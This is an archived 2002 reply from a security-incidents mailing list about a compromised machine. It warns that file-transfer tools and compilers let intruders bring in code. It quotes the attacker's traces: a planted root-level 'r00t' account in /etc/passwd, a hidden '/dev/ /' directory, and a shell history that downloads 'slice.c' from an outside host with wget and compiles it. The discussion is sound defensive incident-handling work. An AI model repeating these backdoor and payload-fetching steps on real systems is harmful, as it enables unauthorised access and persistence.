Security Incidents mailing list archives
Re: watching them -after the fact
From: zeno <bugtraq () cgisecurity net>
Date: Tue, 26 Mar 2002 09:23:01 -0500 (EST)
so they couldn't do much ???
tftp, cc, perl, python, other compliers are all threats. tftp can allow downloading of gcc or other compiliers. scp (secure copy) can also allow this. Never assume something can't be done. If the OS is linux for example they could open an editor and paste compiled code from another system and perhaps get that working. - zeno () cgisecurity com
they also created an empty dir: "/dev/ /" ( yes... a space as its filename ) c ya alvin cat /etc/passwd ... -->> karlin::1001:1001::/tmp:/bin/bash -->> r00t::0:0::/tmp:/bin/bash cat /tmp/.bash_history ... su r00t su r00t sudo suidperl uname -a w uname -a exit su r00t uname -a w exit w su r00t exit w su r00t exit wget turma85.hypermart.net/slice.c gcc -o sl slice.c exit su r00t w exit # # end of history ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- watching them -after the fact Alvin Oga (Mar 25)
- Re: watching them -after the fact zeno (Mar 26)